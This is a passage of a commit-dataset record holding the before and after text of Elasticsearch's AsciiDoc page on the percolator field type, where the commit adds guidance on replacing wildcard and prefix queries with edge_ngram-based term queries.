field value is copied to the `_all` field,\nthe tokens aren't copied.\n\n[float]\n==== Updating a field\n\nIn the essence a field can't be updated. However multi fields can be\nadded to existing fields. This allows for example to have a different\n`index_analyzer` configuration in addition to the already configured\n`index_analyzer` configuration specified in the main and other multi fields.\n\nAlso the new multi field will only be applied on document that have been\nadded after the multi field has been added and in fact the new multi field\ndoesn't exist in existing documents.\n\nAnother important note is that new multi fields will be merged into the\nlist of existing multi fields, so when adding new multi fields for a field\nprevious added multi fields don't need to be specified.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cef7bd2079c15995b73f9e514a66d5d618bcb400","subject":"docs: add best practises for wildcard queries inside percolator queries","message":"docs: add best practises for wildcard queries inside percolator queries\n","repos":"rajanm\/elasticsearch,fred84\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,scottsom\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,wangtuo\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,wangtuo\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wangtuo\/elasticsearch,wangtuo\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,fred84\/elasticsearch","old_file":"docs\/reference\/mapping\/types\/percolator.asciidoc","new_file":"docs\/reference\/mapping\/types\/percolator.asciidoc","new_contents":"[[percolator]]\n=== Percolator type\n\nThe `percolator` field type parses a json structure into a native query and\nstores that query, so that the <<query-dsl-percolate-query,percolate query>>\ncan use it to match provided documents.\n\nAny field that contains a json object can be configured to be a percolator\nfield. The percolator field type has no settings. Just configuring the `percolator`\nfield type is sufficient to instruct Elasticsearch to treat a field as a\nquery.\n\nIf the following mapping configures the `percolator` field type for the\n`query` field:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\n{\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"query\": {\n \"type\": \"percolator\"\n },\n \"field\": {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TESTSETUP\n\nThen you can index a query:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\/_doc\/match_value\n{\n \"query\" : {\n \"match\" : {\n \"field\" : \"value\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[IMPORTANT]\n=====================================\n\nFields referred to in a percolator query must *already* exist in the mapping\nassociated with the index used for percolation. In order to make sure these fields exist,\nadd or update a mapping via the <<indices-create-index,create index>> or <<indices-put-mapping,put mapping>> APIs.\nFields referred in a percolator query may exist in any type of the index containing the `percolator` field type.\n\n=====================================\n\n[float]\n==== Reindexing your percolator queries\n\nReindexing percolator queries is sometimes required to benefit from improvements made to the `percolator` field type in\nnew releases.\n\nReindexing percolator queries can be reindexed by using the <<docs-reindex,reindex api>>.\nLets take a look at the following index with a percolator field type:\n\n[source,js]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"_doc\" : {\n \"properties\": {\n \"query\" : {\n \"type\" : \"percolator\"\n },\n \"body\" : {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n\nPOST _aliases\n{\n \"actions\": [\n {\n \"add\": {\n \"index\": \"index\",\n \"alias\": \"queries\" <1>\n }\n }\n ]\n}\n\nPUT queries\/_doc\/1?refresh\n{\n \"query\" : {\n \"match\" : {\n \"body\" : \"quick brown fox\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> It is always recommended to define an alias for your index, so that in case of a reindex systems \/ applications\n don't need to be changed to know that the percolator queries are now in a different index.\n\nLets say you're going to upgrade to a new major version and in order for the new Elasticsearch version to still be able\nto read your queries you need to reindex your queries into a new index on the current Elasticsearch version:\n\n[source,js]\n--------------------------------------------------\nPUT new_index\n{\n \"mappings\": {\n \"_doc\" : {\n \"properties\": {\n \"query\" : {\n \"type\" : \"percolator\"\n },\n \"body\" : {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n\nPOST \/_reindex?refresh\n{\n \"source\": {\n \"index\": \"index\"\n },\n \"dest\": {\n \"index\": \"new_index\"\n }\n}\n\nPOST _aliases\n{\n \"actions\": [ <1>\n {\n \"remove\": {\n \"index\" : \"index\",\n \"alias\": \"queries\"\n }\n },\n {\n \"add\": {\n \"index\": \"new_index\",\n \"alias\": \"queries\"\n }\n }\n ]\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> If you have an alias don't forget to point it to the new index.\n\nExecuting the `percolate` query via the `queries` alias:\n\n[source,js]\n--------------------------------------------------\nGET \/queries\/_search\n{\n \"query\": {\n \"percolate\" : {\n \"field\" : \"query\",\n \"document\" : {\n \"body\" : \"fox jumps over the lazy dog\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nnow returns matches from the new index:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\": 3,\n \"timed_out\": false,\n \"_shards\": {\n \"total\": 5,\n \"successful\": 5,\n \"skipped\" : 0,\n \"failed\": 0\n },\n \"hits\": {\n \"total\": 1,\n \"max_score\": 0.2876821,\n \"hits\": [\n {\n \"_index\": \"new_index\", <1>\n \"_type\": \"_doc\",\n \"_id\": \"1\",\n \"_score\": 0.2876821,\n \"_source\": {\n \"query\": {\n \"match\": {\n \"body\": \"quick brown fox\"\n }\n }\n },\n \"fields\" : {\n \"_percolator_document_slot\" : [0]\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 3,\/\"took\": \"$body.took\",\/]\n\n<1> Percolator query hit is now being presented from the new index.\n\n[float]\n==== Optimizing query time text analysis\n\nWhen the percolator verifies a percolator candidate match it is going to parse, perform query time text analysis and actually run\nthe percolator query on the document being percolated. This is done for each candidate match and every time the `percolate` query executes.\nIf your query time text analysis is relatively expensive part of query parsing then text analysis can become the\ndominating factor time is being spent on when percolating. This query parsing overhead can become noticeable when the\npercolator ends up verifying many candidate percolator query matches.\n\nTo avoid the most expensive part of text analysis at percolate time. One can choose to do the expensive part of text analysis\nwhen indexing the percolator query. This requires using two different analyzers. The first analyzer actually performs\ntext analysis that needs be performed (expensive part). The second analyzer (usually whitespace) just splits the generated tokens\nthat the first analyzer has produced. Then before indexing a percolator query, the analyze api should be used to analyze the query\ntext with the more expensive analyzer. The result of the analyze api, the tokens, should be used to substitute the original query\ntext in the percolator query. It is important that the query should now be configured to override the analyzer from the mapping and\njust the second analyzer. Most text based queries support an `analyzer` option (`match`, `query_string`, `simple_query_string`).\nUsing this approach the expensive text analysis is performed once instead of many times.\n\nLets demonstrate this workflow via a simplified example.\n\nLets say we want to index the following percolator query:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {\n \"match\" : {\n \"body\" : {\n \"query\" : \"missing bicycles\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nwith these settings and mapping:\n\n[source,js]\n--------------------------------------------------\nPUT \/test_index\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"my_analyzer\" : {\n \"tokenizer\": \"standard\",\n \"filter\" : [\"lowercase\", \"porter_stem\"]\n }\n }\n }\n },\n \"mappings\": {\n \"_doc\" : {\n \"properties\": {\n \"query\" : {\n \"type\": \"percolator\"\n },\n \"body\" : {\n \"type\": \"text\",\n \"analyzer\": \"my_analyzer\" <1>\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> For the purpose of this example, this analyzer is considered expensive.\n\nFirst we need to use the analyze api to perform the text analysis prior to indexing:\n\n[source,js]\n--------------------------------------------------\nPOST \/test_index\/_analyze\n{\n \"analyzer\" : \"my_analyzer\",\n \"text\" : \"missing bicycles\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThis results the following response:\n\n[source,js]\n--------------------------------------------------\n{\n \"tokens\": [\n {\n \"token\": \"miss\",\n \"start_offset\": 0,\n \"end_offset\": 7,\n \"type\": \"<ALPHANUM>\",\n \"position\": 0\n },\n {\n \"token\": \"bicycl\",\n \"start_offset\": 8,\n \"end_offset\": 16,\n \"type\": \"<ALPHANUM>\",\n \"position\": 1\n }\n ]\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\nAll the tokens in the returned order need to replace the query text in the percolator query:\n\n[source,js]\n--------------------------------------------------\nPUT \/test_index\/_doc\/1?refresh\n{\n \"query\" : {\n \"match\" : {\n \"body\" : {\n \"query\" : \"miss bicycl\",\n \"analyzer\" : \"whitespace\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> It is important to select a whitespace analyzer here, otherwise the analyzer defined in the mapping will be used,\nwhich defeats the point of using this workflow. Note that `whitespace` is a built-in analyzer, if a different analyzer\nneeds to be used, it needs to be configured first in the index's settings.\n\nThe analyze api prior to the indexing the percolator flow should be done for each percolator query.\n\nAt percolate time nothing changes and the `percolate` query can be defined normally:\n\n[source,js]\n--------------------------------------------------\nGET \/test_index\/_search\n{\n \"query\": {\n \"percolate\" : {\n \"field\" : \"query\",\n \"document\" : {\n \"body\" : \"Bycicles are missing\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThis results in a response like this:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\": 6,\n \"timed_out\": false,\n \"_shards\": {\n \"total\": 5,\n \"successful\": 5,\n \"skipped\" : 0,\n \"failed\": 0\n },\n \"hits\": {\n \"total\": 1,\n \"max_score\": 0.2876821,\n \"hits\": [\n {\n \"_index\": \"test_index\",\n \"_type\": \"_doc\",\n \"_id\": \"1\",\n \"_score\": 0.2876821,\n \"_source\": {\n \"query\": {\n \"match\": {\n \"body\": {\n \"query\": \"miss bicycl\",\n \"analyzer\": \"whitespace\"\n }\n }\n }\n },\n \"fields\" : {\n \"_percolator_document_slot\" : [0]\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 6,\/\"took\": \"$body.took\",\/]\n\n[float]\n==== Optimizing wildcard queries.\n\nWildcard queries are more expensive than other queries for the percolator,\nespecially if the wildcard expressions are large.\n\nIn the case of `wildcard` queries with prefix wildcard expressions or just the `prefix` query,\nthe `edge_ngram` token filter can be used to replace these queries with regular `term`\nquery on a field where the `edge_ngram` token filter is configured.\n\nCreating an index with custom analysis settings:\n\n[source,js]\n--------------------------------------------------\nPUT my_queries1\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"wildcard_prefix\": { <1>\n \"type\": \"custom\",\n \"tokenizer\": \"standard\",\n \"filter\": [\n \"standard\",\n \"lowercase\",\n \"wildcard_edge_ngram\"\n ]\n }\n },\n \"filter\": {\n \"wildcard_edge_ngram\": { <2>\n \"type\": \"edge_ngram\",\n \"min_gram\": 1,\n \"max_gram\": 32\n }\n }\n }\n },\n \"mappings\": {\n \"query\": {\n \"properties\": {\n \"query\": {\n \"type\": \"percolator\"\n },\n \"my_field\": {\n \"type\": \"text\",\n \"fields\": {\n \"prefix\": { <3>\n \"type\": \"text\",\n \"analyzer\": \"wildcard_prefix\",\n \"search_analyzer\": \"standard\"\n }\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> The analyzer that generates the prefix tokens to be used at index time only.\n<2> Increase the `min_gram` and decrease `max_gram` settings based on your prefix search needs.\n<3> This multifield should be used to do the prefix search\n with a `term` or `match` query instead of a `prefix` or `wildcard` query.\n\n\nThen instead of indexing the following query:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\": {\n \"wildcard\": {\n \"my_field\": \"abc*\"\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nthis query below should be indexed:\n\n[source,js]\n--------------------------------------------------\nPUT \/my_queries1\/query\/1?refresh\n{\n \"query\": {\n \"term\": {\n \"my_field.prefix\": \"abc\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThis way can handle the second query more efficiently than the first query.\n\nThe following search request will match with the previously indexed\npercolator query:\n\n[source,js]\n--------------------------------------------------\nGET \/my_queries1\/_search\n{\n \"query\": {\n \"percolate\": {\n \"field\": \"query\",\n \"document\": {\n \"my_field\": \"abcd\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n[source,js]\n--------------------------------------------------\n{\n \"took\": 6,\n \"timed_out\": false,\n \"_shards\": {\n \"total\": 5,\n \"successful\": 5,\n \"skipped\": 0,\n \"failed\": 0\n },\n \"hits\": {\n \"total\": 1,\n \"max_score\": 0.41501677,\n \"hits\": [\n {\n \"_index\": \"my_queries1\",\n \"_type\": \"query\",\n \"_id\": \"1\",\n \"_score\": 0.41501677,\n \"_source\": {\n \"query\": {\n \"term\": {\n \"my_field.prefix\": \"abc\"\n }\n }\n },\n \"fields\": {\n \"_percolator_document_slot\": [\n 0\n ]\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 6,\/\"took\": \"$body.took\",\/]\n\nThe same technique can also be used to speed up suffix\nwildcard searches. By using the `reverse` token filter\nbefore the `edge_ngram` token filter.\n\n[source,js]\n--------------------------------------------------\nPUT my_queries2\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"wildcard_suffix\": {\n \"type\": \"custom\",\n \"tokenizer\": \"standard\",\n \"filter\": [\n \"standard\",\n \"lowercase\",\n \"reverse\",\n \"wildcard_edge_ngram\"\n ]\n },\n \"wildcard_suffix_search_time\": {\n \"type\": \"custom\",\n \"tokenizer\": \"standard\",\n \"filter\": [\n \"standard\",\n \"lowercase\",\n \"reverse\"\n ]\n }\n },\n \"filter\": {\n \"wildcard_edge_ngram\": {\n \"type\": \"edge_ngram\",\n \"min_gram\": 1,\n \"max_gram\": 32\n }\n }\n }\n },\n \"mappings\": {\n \"query\": {\n \"properties\": {\n \"query\": {\n \"type\": \"percolator\"\n },\n \"my_field\": {\n \"type\": \"text\",\n \"fields\": {\n \"suffix\": {\n \"type\": \"text\",\n \"analyzer\": \"wildcard_suffix\",\n \"search_analyzer\": \"wildcard_suffix_search_time\" <1>\n }\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> A custom analyzer is needed at search time too, because otherwise\n the query terms are not being reversed and would otherwise not match\n with the reserved suffix tokens.\n\nThen instead of indexing the following query:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\": {\n \"wildcard\": {\n \"my_field\": \"*xyz\"\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nthe following query below should be indexed:\n\n[source,js]\n--------------------------------------------------\nPUT \/my_queries2\/query\/2?refresh\n{\n \"query\": {\n \"match\": { <1>\n \"my_field.suffix\": \"xyz\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> The `match` query should be used instead of the `term` query,\n because text analysis needs to reverse the query terms.\n\nThe following search request will match with the previously indexed\npercolator query:\n\n[source,js]\n--------------------------------------------------\nGET \/my_queries2\/_search\n{\n \"query\": {\n \"percolate\": {\n \"field\": \"query\",\n \"document\": {\n \"my_field\": \"wxyz\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n[float]\n==== Dedicated Percolator Index\n\nPercolate queries can be added to any index. Instead of adding percolate queries to the index the data resides in,\nthese queries can also be added to a dedicated index. The advantage of this is that this dedicated percolator index\ncan have its own index settings (For example the number of primary and replica shards). If you choose to have a dedicated\npercolate index, you need to make sure that the mappings from the normal index are also available on the percolate index.\nOtherwise percolate queries can be parsed incorrectly.\n\n[float]\n==== Forcing Unmapped Fields to be Handled as Strings\n\nIn certain cases it is unknown what kind of percolator queries do get registered, and if no field mapping exists for fields\nthat are referred by percolator queries then adding a percolator query fails. This means the mapping needs to be updated\nto have the field with the appropriate settings, and then the percolator query can be added. But sometimes it is sufficient\nif all unmapped fields are handled as if these were default text fields. In those cases one can configure the\n`index.percolator.map_unmapped_fields_as_text` setting to `true` (default to `false`) and then if a field referred in\na percolator query does not exist, it will be handled as a default text field so that adding the percolator query doesn't\nfail.\n\n[float]\n==== Limitations\n\n[float]\n===== Parent\/child\n\nBecause the `percolate` query is processing one document at a time, it doesn't support queries and filters that run\nagainst child documents such as `has_child` and `has_parent`.\n\n[float]\n===== Fetching queries\n\nThere are a number of queries that fetch data via a get call during query parsing. For example the `terms` query when\nusing terms lookup, `template` query when using indexed scripts and `geo_shape` when using pre-indexed shapes. When these\nqueries are indexed by the `percolator` field type then the get call is executed once. So each time the `percolator`\nquery evaluates these queries, the fetches terms, shapes etc. as the were upon index time will be used. Important to note\nis that fetching of terms that these queries do, happens both each time the percolator query gets indexed on both primary\nand replica shards, so the terms that are actually indexed can be different between shard copies, if the source index\nchanged while indexing.\n\n[float]\n===== Script query\n\nThe script inside a `script` query can only access doc values fields. The `percolate` query indexes the provided document\ninto an in-memory index. This in-memory index doesn't support stored fields and because of that the `_source` field and\nother stored fields are not stored. This is the reason why in the `script` query the `_source` and other stored fields\naren't available.\n","old_contents":"[[percolator]]\n=== Percolator type\n\nThe `percolator` field type parses a json structure into a native query and\nstores that query, so that the <<query-dsl-percolate-query,percolate query>>\ncan use it to match provided documents.\n\nAny field that contains a json object can be configured to be a percolator\nfield. The percolator field type has no settings. Just configuring the `percolator`\nfield type is sufficient to instruct Elasticsearch to treat a field as a\nquery.\n\nIf the following mapping configures the `percolator` field type for the\n`query` field:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\n{\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"query\": {\n \"type\": \"percolator\"\n },\n \"field\": {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TESTSETUP\n\nThen you can index a query:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\/_doc\/match_value\n{\n \"query\" : {\n \"match\" : {\n \"field\" : \"value\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[IMPORTANT]\n=====================================\n\nFields referred to in a percolator query must *already* exist in the mapping\nassociated with the index used for percolation. In order to make sure these fields exist,\nadd or update a mapping via the <<indices-create-index,create index>> or <<indices-put-mapping,put mapping>> APIs.\nFields referred in a percolator query may exist in any type of the index containing the `percolator` field type.\n\n=====================================\n\n[float]\n==== Reindexing your percolator queries\n\nReindexing percolator queries is sometimes required to benefit from improvements made to the `percolator` field type in\nnew releases.\n\nReindexing percolator queries can be reindexed by using the <<docs-reindex,reindex api>>.\nLets take a look at the following index with a percolator field type:\n\n[source,js]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"_doc\" : {\n \"properties\": {\n \"query\" : {\n \"type\" : \"percolator\"\n },\n \"body\" : {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n\nPOST _aliases\n{\n \"actions\": [\n {\n \"add\": {\n \"index\": \"index\",\n \"alias\": \"queries\" <1>\n }\n }\n ]\n}\n\nPUT queries\/_doc\/1?refresh\n{\n \"query\" : {\n \"match\" : {\n \"body\" : \"quick brown fox\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> It is always recommended to define an alias for your index, so that in case of a reindex systems \/ applications\n don't need to be changed to know that the percolator queries are now in a different index.\n\nLets say you're going to upgrade to a new major version and in order for the new Elasticsearch version to still be able\nto read your queries you need to reindex your queries into a new index on the current Elasticsearch version:\n\n[source,js]\n--------------------------------------------------\nPUT new_index\n{\n \"mappings\": {\n \"_doc\" : {\n \"properties\": {\n \"query\" : {\n \"type\" : \"percolator\"\n },\n \"body\" : {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n\nPOST \/_reindex?refresh\n{\n \"source\": {\n \"index\": \"index\"\n },\n \"dest\": {\n \"index\": \"new_index\"\n }\n}\n\nPOST _aliases\n{\n \"actions\": [ <1>\n {\n \"remove\": {\n \"index\" : \"index\",\n \"alias\": \"queries\"\n }\n },\n {\n \"add\": {\n \"index\": \"new_index\",\n \"alias\": \"queries\"\n }\n }\n ]\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> If you have an alias don't forget to point it to the new index.\n\nExecuting the `percolate` query via the `queries` alias:\n\n[source,js]\n--------------------------------------------------\nGET \/queries\/_search\n{\n \"query\": {\n \"percolate\" : {\n \"field\" : \"query\",\n \"document\" : {\n \"body\" : \"fox jumps over the lazy dog\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nnow returns matches from the new index:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\": 3,\n \"timed_out\": false,\n \"_shards\": {\n \"total\": 5,\n \"successful\": 5,\n \"skipped\" : 0,\n \"failed\": 0\n },\n \"hits\": {\n \"total\": 1,\n \"max_score\": 0.2876821,\n \"hits\": [\n {\n \"_index\": \"new_index\", <1>\n \"_type\": \"_doc\",\n \"_id\": \"1\",\n \"_score\": 0.2876821,\n \"_source\": {\n \"query\": {\n \"match\": {\n \"body\": \"quick brown fox\"\n }\n }\n },\n \"fields\" : {\n \"_percolator_document_slot\" : [0]\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 3,\/\"took\": \"$body.took\",\/]\n\n<1> Percolator query hit is now being presented from the new index.\n\n[float]\n==== Optimizing query time text analysis\n\nWhen the percolator verifies a percolator candidate match it is going to parse, perform query time text analysis and actually run\nthe percolator query on the document being percolated. This is done for each candidate match and every time the `percolate` query executes.\nIf your query time text analysis is relatively expensive part of query parsing then text analysis can become the\ndominating factor time is being spent on when percolating. This query parsing overhead can become noticeable when the\npercolator ends up verifying many candidate percolator query matches.\n\nTo avoid the most expensive part of text analysis at percolate time. One can choose to do the expensive part of text analysis\nwhen indexing the percolator query. This requires using two different analyzers. The first analyzer actually performs\ntext analysis that needs be performed (expensive part). The second analyzer (usually whitespace) just splits the generated tokens\nthat the first analyzer has produced. Then before indexing a percolator query, the analyze api should be used to analyze the query\ntext with the more expensive analyzer. The result of the analyze api, the tokens, should be used to substitute the original query\ntext in the percolator query. It is important that the query should now be configured to override the analyzer from the mapping and\njust the second analyzer. Most text based queries support an `analyzer` option (`match`, `query_string`, `simple_query_string`).\nUsing this approach the expensive text analysis is performed once instead of many times.\n\nLets demonstrate this workflow via a simplified example.\n\nLets say we want to index the following percolator query:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {\n \"match\" : {\n \"body\" : {\n \"query\" : \"missing bicycles\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nwith these settings and mapping:\n\n[source,js]\n--------------------------------------------------\nPUT \/test_index\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"my_analyzer\" : {\n \"tokenizer\": \"standard\",\n \"filter\" : [\"lowercase\", \"porter_stem\"]\n }\n }\n }\n },\n \"mappings\": {\n \"_doc\" : {\n \"properties\": {\n \"query\" : {\n \"type\": \"percolator\"\n },\n \"body\" : {\n \"type\": \"text\",\n \"analyzer\": \"my_analyzer\" <1>\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> For the purpose of this example, this analyzer is considered expensive.\n\nFirst we need to use the analyze api to perform the text analysis prior to indexing:\n\n[source,js]\n--------------------------------------------------\nPOST \/test_index\/_analyze\n{\n \"analyzer\" : \"my_analyzer\",\n \"text\" : \"missing bicycles\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThis results the following response:\n\n[source,js]\n--------------------------------------------------\n{\n \"tokens\": [\n {\n \"token\": \"miss\",\n \"start_offset\": 0,\n \"end_offset\": 7,\n \"type\": \"<ALPHANUM>\",\n \"position\": 0\n },\n {\n \"token\": \"bicycl\",\n \"start_offset\": 8,\n \"end_offset\": 16,\n \"type\": \"<ALPHANUM>\",\n \"position\": 1\n }\n ]\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\nAll the tokens in the returned order need to replace the query text in the percolator query:\n\n[source,js]\n--------------------------------------------------\nPUT \/test_index\/_doc\/1?refresh\n{\n \"query\" : {\n \"match\" : {\n \"body\" : {\n \"query\" : \"miss bicycl\",\n \"analyzer\" : \"whitespace\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> It is important to select a whitespace analyzer here, otherwise the analyzer defined in the mapping will be used,\nwhich defeats the point of using this workflow. Note that `whitespace` is a built-in analyzer, if a different analyzer\nneeds to be used, it needs to be configured first in the index's settings.\n\nThe analyze api prior to the indexing the percolator flow should be done for each percolator query.\n\nAt percolate time nothing changes and the `percolate` query can be defined normally:\n\n[source,js]\n--------------------------------------------------\nGET \/test_index\/_search\n{\n \"query\": {\n \"percolate\" : {\n \"field\" : \"query\",\n \"document\" : {\n \"body\" : \"Bycicles are missing\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThis results in a response like this:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\": 6,\n \"timed_out\": false,\n \"_shards\": {\n \"total\": 5,\n \"successful\": 5,\n \"skipped\" : 0,\n \"failed\": 0\n },\n \"hits\": {\n \"total\": 1,\n \"max_score\": 0.2876821,\n \"hits\": [\n {\n \"_index\": \"test_index\",\n \"_type\": \"_doc\",\n \"_id\": \"1\",\n \"_score\": 0.2876821,\n \"_source\": {\n \"query\": {\n \"match\": {\n \"body\": {\n \"query\": \"miss bicycl\",\n \"analyzer\": \"whitespace\"\n }\n }\n }\n },\n \"fields\" : {\n \"_percolator_document_slot\" : [0]\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 6,\/\"took\": \"$body.took\",\/]\n\n[float]\n==== Dedicated Percolator Index\n\nPercolate queries can be added to any index. Instead of adding percolate queries to the index the data resides in,\nthese queries can also be added to a dedicated index. The advantage of this is that this dedicated percolator index\ncan have its own index settings (For example the number of primary and replica shards). If you choose to have a dedicated\npercolate index, you need to make sure that the mappings from the normal index are also available on the percolate index.\nOtherwise percolate queries can be parsed incorrectly.\n\n[float]\n==== Forcing Unmapped Fields to be Handled as Strings\n\nIn certain cases it is unknown what kind of percolator queries do get registered, and if no field mapping exists for fields\nthat are referred by percolator queries then adding a percolator query fails. This means the mapping needs to be updated\nto have the field with the appropriate settings, and then the percolator query can be added. But sometimes it is sufficient\nif all unmapped fields are handled as if these were default text fields. In those cases one can configure the\n`index.percolator.map_unmapped_fields_as_text` setting to `true` (default to `false`) and then if a field referred in\na percolator query does not exist, it will be handled as a default text field so that adding the percolator query doesn't\nfail.\n\n[float]\n==== Limitations\n\n[float]\n===== Parent\/child\n\nBecause the `percolate` query is processing one document at a time, it doesn't support queries and filters that run\nagainst child documents such as `has_child` and `has_parent`.\n\n[float]\n===== Fetching queries\n\nThere are a number of queries that fetch data via a get call during query parsing. For example the `terms` query when\nusing terms lookup, `template` query when using indexed scripts and `geo_shape` when using pre-indexed shapes. When these\nqueries are indexed by the `percolator` field type then the get call is executed once. So each time the `percolator`\nquery evaluates these queries, the fetches terms, shapes etc. as the were upon index time will be used. Important to note\nis that fetching of terms that these queries do, happens both each time the percolator query gets indexed on both primary\nand replica shards, so the terms that are actually indexed can be different between shard copies, if the source index\nchanged while indexing.\n\n[float]\n===== Script query\n\nThe script inside a `script` query can only access doc values fields. The `percolate` query indexes the provided document\ninto an in-memory 